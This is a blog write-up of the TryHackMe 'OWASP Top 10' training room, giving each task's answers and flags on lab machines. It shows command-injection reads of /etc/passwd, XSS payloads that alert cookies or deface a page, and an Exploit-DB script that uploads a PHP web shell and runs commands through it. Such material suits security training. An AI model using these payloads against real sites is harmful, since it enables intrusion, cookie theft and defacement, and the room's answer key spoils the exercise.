Frank Osasere Idugboe

Posted on Oct 25, 2023

OWASP Top 10 - Write-up - TryHackMe

#cybersecurity #senseleaner #websecurity #onlinesecurity

Information
Room
Name: OWASP Top 10
Profile: tryhackme.com
Difficulty: Easy
Description: Learn about and exploit each of the OWASP Top 10 vulnerabilities; the 10 most critical web security risks.
OWASP Top 10

Write-up
Overview
Install tools used in this WU on BlackArch Linux:
1
$ sudo pacman -S exploitdb dbeaver python

Command Injection Practical#
What strange text file is in the website root directory?

Answer: drpepper.txt

Issue the ls command to list files.

css drpepper.txt evilshell.php index.php js
How many non-root/non-service/non-daemon users are there?

Answer: 0

Issue the cat /etc/passwd command, it seems there is no non-root/non-service/non-daemon users.

1.daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
2.bin:x:2:2:bin:/bin:/usr/sbin/nologin
3.sys:x:3:3:sys:/dev:/usr/sbin/nologin
4.sync:x:4:65534:sync:/bin:/bin/sync
5.games:x:5:60:games:/usr/games:/usr/sbin/nologin
6.man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
7.lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
8.mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
9.news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
10.uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
11.proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
12.www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
13.backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
14.list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
15.irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
16.gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin                 
17.nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
18.systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
19.systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
20.syslog:x:102:106::/home/syslog:/usr/sbin/nologin
21.messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
22._apt:x:104:65534::/nonexistent:/usr/sbin/nologin
23.lxd:x:105:65534::/var/lib/lxd/:/bin/false
24.uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
25.dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
26.landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
27.pollinate:x:109:1::/var/cache/pollinate:/bin/false
28.sshd:x:110:65534::/run/sshd:/usr/sbin/nologin

What user is this app running as?

Answer: www-data

Issue the id command.
uid=33(www-data) gid=33(www-data) groups=33(www-data)
What is the user's shell set as?

Answer: /usr/sbin/nologin

echo $SHELL returns nothing, so let's try cat /etc/passwd | grep www-data | cut -d ':' -f 7.

/usr/sbin/nologin

What version of Ubuntu is running?

Answer: 18.04.4

Run cat /etc/os-release.

1.VERSION="18.04.4 LTS (Bionic Beaver)"
2.ID=ubuntu
3.ID_LIKE=debian
4.PRETTY_NAME="Ubuntu 18.04.4 LTS"
5.VERSION_ID="18.04"
6.HOME_URL="https://www.ubuntu.com/"
7.SUPPORT_URL="https://help.ubuntu.com/"
8.BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
9.PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
10.VERSION_CODENAME=bionic
11.UBUNTU_CODENAME=bionic

Print out the MOTD. What favorite beverage is shown?

Answer: Dr pepper

1.$ ls -1 /etc/update-motd.d/
2.10-help-text
3.50-landscape-sysinfo
4.50-motd-news
5.80-esm
6.80-livepatch
7.90-updates-available
8.91-release-upgrade
9.92-unattended-upgrades
10.95-hwe-eol
11.97-overlayroot
12.98-fsck-at-reboot
13.98-reboot-required
14.
15.$ cat /etc/update-motd.d/00-header
16.#
17.#    00-header - create the header of the MOTD
18.#    Copyright (C) 2009-2010 Canonical Ltd.
19.#
20.#    Authors: Dustin Kirkland <kirkland@canonical.com>
21.#
22.#    This program is free software; you can redistribute it and/or modify
23.#    it under the terms of the GNU General Public License as published by
24.#    the Free Software Foundation; either version 2 of the License, or
25.#    (at your option) any later version.
26.#
27.#    This program is distributed in the hope that it will be useful,
28.#    but WITHOUT ANY WARRANTY; without even the implied warranty of
29.#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
30.#    GNU General Public License for more details.
31.#
32.#    You should have received a copy of the GNU General Public License along
33.#    with this program; if not, write to the Free Software Foundation, Inc.,
34.#    51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
35.
36.[ -r /etc/lsb-release ] && . /etc/lsb-release
37.
38.if [ -z "$DISTRIB_DESCRIPTION" ] && [ -x /usr/bin/lsb_release ]; then
39. # Fall back to using the very slow lsb_release utility
40. DISTRIB_DESCRIPTION=$(lsb_release -s -d)
41.fi
42.
43.printf "Welcome to %s (%s %s %s)\n" "$DISTRIB_DESCRIPTION" "$(uname -o)" "$(uname -r)" "$(uname -m)"
44.
45.DR PEPPER MAKES THE WORLD TASTE BETTER!

Broken Authentication Practical

What is the flag that you found in darren's account?

Answer: fe86079416a21a3c99937fea8874b667

What is the flag that you found in arthur's account?

Answer: d9ac0f7db4fda460ac3edeb75d75e16e

Sensitive Data Exposure (Challenge)

Have a look around the webapp. The developer has left themselves a note indicating that there is sensitive data in a specific directory.

What is the name of the mentioned directory?

Answer: /assets

Navigate to the directory you found in question one. What file stands out as being likely to contain sensitive data?

Answer: webapp.db

Use the supporting material to access the sensitive data. What is the password hash of the admin user?

Answer: 6eea9b7ef19179a06954edd0f6c05ceb

Open the DB with dbeaver.

Crack the hash. What is the admin's plaintext password?

Answer: qwertyuiop

Crack the password with crackstation.
Login as the admin. What is the flag?

Answer: THM{Yzc2YjdkMjE5N2VjMzNhOTE3NjdiMjdl}

XML External Entity - eXtensible Markup Language

Full form of XML

Answer: eXtensible Markup Language

Is it compulsory to have XML prolog in XML documents?

Answer: yes

Can we validate XML documents against a schema?

Answer: yes

How can we specify XML version and encoding in XML document?

Answer: XML Prolog

XML External Entity - DTD

How do you define a new ELEMENT?

Answer:!ELEMENT

How do you define a ROOT element?

Answer:!DOCTYPE

How do you define a new ENTITY?

Answer:!ENTITY

XML External Entity - Exploiting

What is the name of the user in /etc/passwd

Answer: falcon

Where is falcon's SSH key located?

Answer: /home/falcon/.ssh/id_rsa

What are the first 18 characters for falcon's private key

Answer: MIIEogIBAAKCAQEA7b

Broken Access Control (IDOR Challenge)

Look at other users notes. What is the flag?

http://10.10.125.211/note.php?note=0

Answer: flag{fivefourthree}

Security Misconfiguration

Hack into the webapp, and find the flag!

Answer: thm{4b9513968fd564a87b28aa1f9d672e17}

Cross-site Scripting

Go to http://10.10.93.135/reflected and craft a reflected XSS payload that will cause a popup saying "Hello".

Answer: ThereIsMoreToXSSThanYouThink

<script>alert("Hello")</script>

On the same reflective page, craft a reflected XSS payload that will cause a popup with your machine's IP address.

<script>alert(window.location.hostname)</script>

Answer: ReflectiveXss4TheWin

Now navigate to http://10.10.93.135/stored and make an account.

Then add a comment and see if you can insert some of your own HTML.

<b>noraj is bold</b>

Answer: HTML_T4gs

On the same page, create an alert popup box to appear on the page with your document cookies.

<script>alert(document.cookies)</script>

Answer: W3LL_D0N3_LVL2s

Change "XSS Playground" to "I am a hacker" by adding a comment and using Javascript.

<script>document.querySelector("#thm-title").textContent = "I am a hacker"</script>

Answer: websites_can_be_easily_defaced_with_xss

Insecure Deserialization

Who developed the Tomcat application?

Answer: The Apache Software Foundation

What type of attack that crashes services can be performed with insecure deserialization?

Answer: denial of service

Insecure Deserialization - Objects

Select the correct term for the following statement:

Answer: A Behaviour

Insecure Deserialization - Deserialization

What is the name of the base-2 formatting that data is sent across a network as?

Answer: binary

Insecure Deserialization - Cookies

If a cookie had the path of webapp.com/login, what would the URL that the user has to visit be?

Answer: webapp.com/login

What is the acronym for the web technology that Secure cookies work over?

Answer: HTTPS

Insecure Deserialization - Cookies Practical

1st flag (cookie value)

Answer: THM{good_old_base64_huh}

1.$ printf %s 'gAN9cQAoWAkAAABzZXNzaW9uSWRxAVggAAAAYzdkYzQ0ODM4ZTA4NDdiMWI0NTU0NDk0OGE5MmQxOTRxAlgLAAAAZW5jb2RlZGZsYWdxA1gYAAAAVEhNe2dvb2Rfb2xkX2Jhc2U2NF9odWh9cQR1Lg==' | base64 -d
2.}q(X    sessionIdqX c7dc44838e0847b1b45544948a92d194qX
                                                      3.encodedflagqXTHM{good_old_base64_huh}qu.

2nd flag (admin dashboard)

Answer: THM{heres_the_admin_flag}

Insecure Deserialization - Remote Code Execution
flag.txt

Answer: 4a69a7ff9fd68

Components With Known Vulnerabilities - Lab

How many characters are in /etc/passwd (use wc -c /etc/passwd to get the answer)

Answer: 1611

1.$ searchsploit CSE bookstore
2.------------------------------------------------------------------------------------ ---------------------------------
3. Exploit Title                                                                      |  Path
4.------------------------------------------------------------------------------------ ---------------------------------
5.CSE Bookstore 1.0 - 'quantity' Persistent Cross-site Scripting                      | php/webapps/48973.txt
6.CSE Bookstore 1.0 - Authentication Bypass                                           | php/webapps/48960.txt
7.------------------------------------------------------------------------------------ ---------------------------------
8.Shellcodes: No Results
9.
10.$ searchsploit online book store
11.------------------------------------------------------------------------------------ ---------------------------------
12. Exploit Title                                                                      |  Path
13.------------------------------------------------------------------------------------ ---------------------------------
14.GotoCode Online Bookstore - Multiple Vulnerabilities                                | asp/webapps/17921.txt
15.Online Book Store 1.0 - 'bookisbn' SQL Injection                                    | php/webapps/47922.txt
16.Online Book Store 1.0 - 'id' SQL Injection                                          | php/webapps/48775.txt
17.Online Book Store 1.0 - Arbitrary File Upload                                       | php/webapps/47928.txt
18.Online Book Store 1.0 - Unauthenticated Remote Code Execution                       | php/webapps/47887.py
19.------------------------------------------------------------------------------------ ---------------------------------
20.Shellcodes: No Results
21.
22.$ searchsploit -p 47887
23.  Exploit: Online Book Store 1.0 - Unauthenticated Remote Code Execution
24.    URL: https://www.exploit-db.com/exploits/47887
25.     Path: /usr/share/exploitdb/exploits/php/webapps/47887.py
26.File Type: ASCII text, with CRLF line terminators
27.
28.$ python /usr/share/exploitdb/exploits/php/webapps/47887.py http://10.10.74.65
29.> Attempting to upload PHP web shell...
30.> Verifying shell upload...
31.> Web shell uploaded to http://10.10.74.65/bootstrap/img/P82Exx96Uv.php
32.> Example command usage: http://10.10.74.65/bootstrap/img/P82Exx96Uv.php?cmd=whoami
33.> Do you wish to launch a shell here? (y/n): y
34.RCE $ wc -c /etc/passwd
35.1611 /etc/passwd

Insufficient Logging and Monitoring

What IP address is the attacker using?

Answer: 49.99.13.16

What kind of attack is being carried out?

Answer: brute force

DEV Community